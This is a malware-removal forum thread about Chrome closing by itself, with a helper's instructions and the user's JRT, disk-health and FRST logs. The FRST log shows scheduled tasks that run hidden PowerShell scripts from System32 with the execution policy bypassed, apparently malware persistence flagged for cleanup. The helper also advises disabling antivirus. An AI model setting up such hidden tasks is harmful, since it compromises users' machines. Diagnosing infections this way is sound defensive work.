Chrome keeps closing by itself


Post by autoprd » 07 Nov 2022 23:03

Hello, for the past 2 weeks Chrome has kept closing by itself.
The only thing I find in the event log at the same time Chrome closes is PowerShell: 12 entries within 20 seconds. Screenshots are attached.

The PC was checked with MBAM, AdwCleaner and RogueKiller: nothing found.
Chrome was uninstalled and cleaned with the Cleanup tool, and the User folder in AppData/chrome was deleted.
All extensions were disabled.
Tasks in Task Scheduler were disabled.
Absolutely no change.


Thank you very much.
Attachments
ulohy.rar
(33.51 KiB) Downloaded 15 times
FRST.rar
(27.13 KiB) Downloaded 17 times


Post by jaro3 » 07 Nov 2022 23:17

Paste the logs directly into the post. It is hard to decipher this way. I'll wait.

+
Download Junkware Removal Tool by Thisisu
http://www.bleepingcomputer.com/downloa ... oval-tool/
https://downloads.malwarebytes.com/file/JRT-EOL
to your desktop.

Disable your antivirus program. Right-click JRT.exe and choose "Run as administrator". You will be prompted to press any key to continue. Press one.
The program will start scanning. The scan may take a long time, depending on the number of infections. When the scan finishes, a log (JRT.txt) will appear and be saved on the desktop.
Please copy its entire contents here.


Download CrystalDiskInfo
https://www.stahuj.cz/utility_a_ostatni ... ldiskinfo/
Run the program and click Edit - Copy. Then paste the log contents here with Ctrl+V.
When working with HJT, ComboFix, MbAM, SDFix, etc., close all other applications and browsers!
Do not send logs via private messages. While I am away, memphisto, Žbeky and Orcus stand in for me.
If you are satisfied, you can support our forum: Forum support


Post by autoprd » 07 Nov 2022 23:29

OK, thank you very much ;)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64
Ran by Woytman (Administrator) on 07.11.2022 at 23:27:09,87
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 6

Successfully deleted: C:\ProgramData\productdata (Folder)
Successfully deleted: C:\Users\Public\thunder network (Folder)
Successfully deleted: C:\WINDOWS\system32\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001 (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\update-sys (Task)
Successfully deleted: C:\WINDOWS\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001.job (Task)
Successfully deleted: C:\WINDOWS\Tasks\update-sys.job (Task)



Registry: 2

Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} (Registry Key)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 07.11.2022 at 23:28:37,61
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Last edited by autoprd on 07 Nov 2022 23:32; edited 1 time in total.


Post by autoprd » 07 Nov 2022 23:29

----------------------------------------------------------------------------
CrystalDiskInfo 8.17.11 (C) 2008-2022 hiyohiyo
Crystal Dew World: https://crystalmark.info/
----------------------------------------------------------------------------

OS : Windows 11 [10.0 Build 22000] (x64)
Date : 2022/11/07 23:27:00

-- Controller Map ----------------------------------------------------------
+ Intel(R) 300 Series Chipset Family SATA AHCI Controller [ATA]
- ADATA SU800
+ Řadič Standard NVM Express [SCSI]
- WDC PC SN520 SDAPNUW-512G-1032
- Řadič prostorů úložišť [SCSI]

-- Disk List ---------------------------------------------------------------
(01) WDC PC SN520 SDAPNUW-512G-1032 : 512,1 GB [0/0/0, sq] - nv
(02) ADATA SU800 : 512,1 GB [1/1/4, pd1] - sm

----------------------------------------------------------------------------
(01) WDC PC SN520 SDAPNUW-512G-1032
----------------------------------------------------------------------------
Model : WDC PC SN520 SDAPNUW-512G-1032
Firmware : 20140000
Serial Number : 191506801158
Disk Size : 512,1 GB
Interface : NVM Express
Standard : NVM Express 1.3
Transfer Mode : PCIe 3.0 x2 | PCIe 3.0 x2
Power On Hours : 6502 hours
Power On Count : 3939 count
Host Reads : 45343 GB
Host Writes : 36521 GB
Temperature : 43 C (109 F)
Health Status : Good (96 %)
Features : S.M.A.R.T., TRIM, VolatileWriteCache
Drive Letter : C: Z:

-- S.M.A.R.T. --------------------------------------------------------------
ID RawValues(6) Attribute Name
01 000000000000 Critical Warning
02 00000000013C Composite Temperature
03 000000000064 Available Spare
04 00000000000A Available Spare Threshold
05 000000000004 Percentage Used
06 000005AAFC0E Data Units Read
07 00000490B28B Data Units Written
08 0000276A484A Host Read Commands
09 000024887385 Host Write Commands
0A 0000000008F8 Controller Busy Time
0B 000000000F63 Power Cycles
0C 000000001966 Power On Hours
0D 00000000004D Unsafe Shutdowns
0E 000000000000 Media and Data Integrity Errors
0F 000000000000 Number of Error Information Log Entries


----------------------------------------------------------------------------
(02) ADATA SU800
----------------------------------------------------------------------------
Model : ADATA SU800
Firmware : R0427ANR
Serial Number : 2J0720126252
Disk Size : 512,1 GB (8,4/137,4/512,1/----)
Buffer Size : Unknown
Queue Depth : 32
# of Sectors : 1000215216
Rotation Rate : ---- (SSD)
Interface : Serial ATA
Major Version : ACS-3
Minor Version : ACS-3 Revision 5
Transfer Mode : SATA/600 | SATA/600
Power On Hours : 6471 hours
Power On Count : 2746 count
Host Reads : 12579 GB
Host Writes : 13819 GB
NAND Writes : 72720 GB
Temperature : 27 C (80 F)
Health Status : Good (91 %)
Features : S.M.A.R.T., APM, NCQ, TRIM, DevSleep, GPL
APM Level : 00FEh [ON]
AAM Level : ----
Drive Letter : D: E:

-- S.M.A.R.T. --------------------------------------------------------------
ID Cur Wor Thr RawValues(6) Attribute Name
01 100 100 __0 000000000000 Read Error Rate
05 100 100 __0 000000000000 Reallocated Sectors Count
09 100 100 __0 000000001947 Power-On Hours
0C 100 100 __0 000000000ABA Power Cycle Count
94 100 100 __0 000000003309 SLC Total Erase Count
95 100 100 __0 000000000380 SLC Maximum Erase Count
96 100 100 __0 000000000313 SLC Minimum Erase Count
97 100 100 __0 000000000367 SLC Average Erase Count
9F 100 100 __0 000000000000 DRAM 1 bit Error Count
A0 100 100 __0 000000000000 Uncorrectable sectors count when read/write
A1 100 100 __0 00000000002C Number of Valid Spare Blocks
A3 100 100 __0 00000000000E Number of Initial Invalid Blocks
A4 100 100 __0 00000000FC80 Total Erase Count
A5 100 100 __0 0000000000A3 Maximum Erase Count
A6 100 100 __0 000000000040 Minimum Erase Count
A7 100 100 __0 000000000089 Average Erase Count
A8 100 100 __0 0000000005DC Max Erase Count of Spec
A9 100 100 __0 00000000005B Remain Life
B1 100 100 _50 00000000000A Total Wear Level Count
B5 100 100 __0 000000000000 Total Program Fail Count
B6 100 100 __0 000000000000 Total Erase Fail Count
C0 100 100 __0 0000000000A4 Power-Off Retract Count
C2 100 100 __0 00000000001B Temperature
C3 100 100 __0 000000000000 Hardware ECC Recovered
C4 100 100 _16 000000000000 Reallocation Event Count
C7 100 100 _50 000000000000 Ultra DMA CRC Error Count
E8 100 100 __0 000000000064 Available Reserved Space
F1 100 100 __0 00000006BF78 Total LBA Written
F2 100 100 __0 000000062477 Total LBA Read
F5 100 100 __0 000000238200 Flash Write Sector Count



Post by autoprd » 07 Nov 2022 23:30

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06-11-2022
Ran by Woytman (administrator) on WOYTMAN-NTB (Micro-Star International Co., Ltd. GF75 Thin 9SC) (07-11-2022 22:44:19)
Running from C:\Users\Woytman\Desktop
Loaded Profiles: Woytman
Platform: Microsoft Windows 11 Home Version 21H2 22000.1098 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe ->) (Razer USA Ltd. -> ) C:\Program Files (x86)\Razer\Synapse3\AudioVisualizer\ChromaVisualizer.exe
(C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe ->) (Razer USA Ltd. -> ) C:\Program Files (x86)\Razer\Synapse3\UserProcess\Razer Synapse Service Process.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpCopyAccelerator.exe
(DriverStore\FileRepository\cui_dch.inf_amd64_9b67516eb3c8ed0a\igfxCUIService.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_9b67516eb3c8ed0a\igfxEM.exe
(explorer.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <11>
(Kilonova LLC -> Skillbrains) C:\Program Files (x86)\Skillbrains\lightshot\5.5.0.7\Lightshot.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Adguard Software Limited -> Adguard Software Ltd) C:\Program Files (x86)\Adguard\AdguardSvc.exe
(services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iaahcic.inf_amd64_3de4831720bb2934\RstMwService.exe
(services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_cad1db73e8c782a6\WMIRegistrationService.exe
(services.exe ->) (Intel Corporation -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(services.exe ->) (Intel Corporation -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(services.exe ->) (Intel Corporation -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(services.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_9b67516eb3c8ed0a\igfxCUIService.exe
(services.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_11001eacf352e253\IntelCpHDCPSvc.exe
(services.exe ->) (Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_11001eacf352e253\IntelCpHeciSvc.exe
(services.exe ->) (Locktime Software s.r.o. -> Locktime Software) C:\Program Files\Locktime Software\NetLimiter 4\NLSvc.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\NisSrv.exe
(services.exe ->) (Micro-Star International Co., Ltd.) [File not signed] C:\Windows\SysWOW64\MSIService.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nvmii.inf_amd64_3c492dde906d8149\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Razer USA Ltd. -> Razer Inc) C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe
(services.exe ->) (Razer USA Ltd. -> THX) C:\Program Files (x86)\Razer\THXService\Drivers\x64\THXService.exe
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_5fb296660a9719a9\RtkAudUService64.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows) C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_421.20070.765.0_x64__cw5n1h2txyewy\Dashboard\Widgets.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_5fb296660a9719a9\RtkAudUService64.exe [3498408 2022-07-14] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [THX22adHelper] => C:\Program Files (x86)\Razer\THXVAD\Drivers\x64\THXHelper22ad.exe [386008 2019-09-18] (Razer USA Ltd. -> )
HKLM\...\Run: [THX0520Helper] => C:\Program Files (x86)\Razer\APO0520Drv\Drivers\x64\THXHelper0520.exe [386008 2019-09-18] (Razer USA Ltd. -> )
HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [226728 2019-07-21] (Kilonova LLC -> )
HKLM-x32\...\Run: [Adguard] => C:\Program Files (x86)\Adguard\Adguard.exe [6315480 2022-03-05] (Adguard Software Limited -> Adguard Software Ltd)
HKLM\...\Policies\Explorer: [HideSCAMeetNow] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4234088 2022-10-19] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [MicrosoftEdgeAutoLaunch_211F9FEB1C1D0C6ED6DD47C70C7E0A4C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3891624 2022-11-03] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [38789456 2022-10-20] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [Synapse3] => C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3538440 2022-10-06] (Razer USA Ltd. -> Razer Inc.)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32696784 2022-11-03] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Run: [GogGalaxy] => C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe [13668840 2022-10-11] (GOG Sp. z o.o. -> GOG.com)
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [HideSCAMeetNow] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\MountPoints2: {4da3b049-162e-11ed-8c8f-4889e716f2dc} - "F:\Lenovo_Suite.exe"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.ScreenSaver.scr
HKU\S-1-5-18\...\Run: [RazerAxon] => "C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.exe" -autorun (No File)
HKU\S-1-5-18\...\Run: [Synapse3] => C:\Program Files (x86)\Razer\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3538440 2022-10-06] (Razer USA Ltd. -> Razer Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\107.0.5304.88\Installer\chrmstp.exe [2022-11-02] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->
Startup: C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeepL auto-start.lnk [2022-11-05]
ShortcutTarget: DeepL auto-start.lnk -> (No File)
BootExecute: autocheck autochk * Partizan
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00AAE17D-5854-4922-8396-86326F51A6D2} - System32\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Task: {07B2C277-B2F3-4518-AC45-813D211DE09E} - System32\Tasks\CCleanerCrashReporting => C:\Program Files\CCleaner\CCleanerBugReport.exe [4669264 2022-10-20] (PIRIFORM SOFTWARE LIMITED -> Piriform Software) -> --product 90 --send dumps|report --path "C:\Program Files\CCleaner\LOG" --programpath "C:\Program Files\CCleaner" --configpath "C:\Program Files\CCleaner\Setup" --guid "4995a14b-6ac3-42f4-81c8-496d95a5dd1a" --version "6.05.10110" --silent
Task: {0CCE62CC-DD5A-4AD4-96F0-6A26802D4A53} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpCmdRun.exe [1567336 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {4FF921FB-F882-448B-A433-CCC3A563DCB5} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649784 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {52510CA0-CD65-48FC-99C5-CF57314CEC65} - \Microsoft\Windows\Management\Provisioning\xiHM0g\046E4CE2-D25A-4B57-A2E2-3AD7D55DFBDB -> No File <==== ATTENTION
Task: {5FDD0220-E4B9-4462-AC20-4D9BDB16070E} - System32\Tasks\Microsoft\Windows\Management\Provisioning\User => powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\WINDOWS\System32\57540306-c3ad-454f-bbe7-1c56160757fe.ps1" <==== ATTENTION
Task: {6A7B9D49-E5BF-4199-8990-7D182ADBB306} - System32\Tasks\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {759CFE0A-3FD2-4DDC-88ED-03B512AA677A} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26154960 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {7704A820-CACF-4338-A77F-B5C190ADE09E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpCmdRun.exe [1567336 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {8A790555-880A-4BCD-89E3-C48221871A6B} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [908856 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {8C08485A-D3A1-428D-B46B-7418CCFE0528} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {90412B12-C449-4E08-8793-C4A048C9414D} - System32\Tasks\CCleanerSkipUAC - Woytman => C:\Program Files\CCleaner\CCleaner.exe [32472400 2022-10-20] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
Task: {96BB2A72-BBD3-4A21-B7F2-C23A745E8678} - System32\Tasks\Microsoft\Windows\MUI\LPRemovea93Lqu => powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\D5910F34-9B2F-4E01-80CF-49460B7AF191.ps1" <==== ATTENTION
Task: {9DCE65F7-945F-4A44-9583-A631CB7C8A0B} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2022-10-20] (Piriform Software Ltd -> Piriform)
Task: {A206CE14-2270-46F0-A5FC-4289B1D96F0E} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [8576000 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {A4C668D0-8AD0-45AF-BDA6-1B7075D167AD} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {ADC88314-0FAD-42E4-BB17-E9B7279ED5FD} - System32\Tasks\Microsoft\Office\Office Performance Monitor => C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe [66936 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {B2121AC3-64D0-4926-80EF-D656AC873F89} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {B2F82E57-5A82-46F4-88DC-C41367AF04D9} - System32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {B56CF85C-13CE-4251-98B8-7B20E0F28E48} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1655864 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {BB33B0D9-DD95-40F5-879B-665D56EEEE4F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpCmdRun.exe [1567336 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C84F27BD-C0A4-4A2B-B7D2-B776E78D1B5D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [8576000 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (No File)
Task: {D33291ED-EBB4-4E46-8BD2-70CB7F3457EE} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-08-30] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {D7AFD09A-07CA-4136-926C-CB0629F7DF98} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [908856 2022-10-13] (Nvidia Corporation -> NVIDIA Corporation)
Task: {DD5C7A52-7A1A-49D5-A684-E588487C21E1} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [144312 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {DF86D5F7-3565-4940-8A0C-69614DA27496} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342376 2022-10-17] (Nvidia Corporation -> NVIDIA Corporation)
Task: {E477AEF4-01F5-4174-853E-C49C3F5874D9} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26154960 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
Task: {E71ACF64-B9AB-4B09-AA8D-9E6DF8ED4FEE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpCmdRun.exe [1567336 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F3ED570E-C6D2-4C9E-964E-E3430B16320F} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Task: {F6F93A62-2B96-4E59-95B6-66F954B43D24} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [144312 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CCleanerCrashReporting.job => C:\Program Files\CCleaner\CCleanerBugReport.exe
Task: C:\WINDOWS\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog9 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9 18 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog9-x64 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9-x64 18 %windir%\system32\vsocklib.dll => No File
Tcpip\Parameters: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{07759c78-08b7-499b-9e76-9b1429355859}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{2809612c-d134-4c83-9a3f-32c34183507c}: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{2e4c83d7-15f2-48d4-8ad7-5fd397c1eb13}: [DhcpNameServer] 192.168.10.1 0.0.0.0
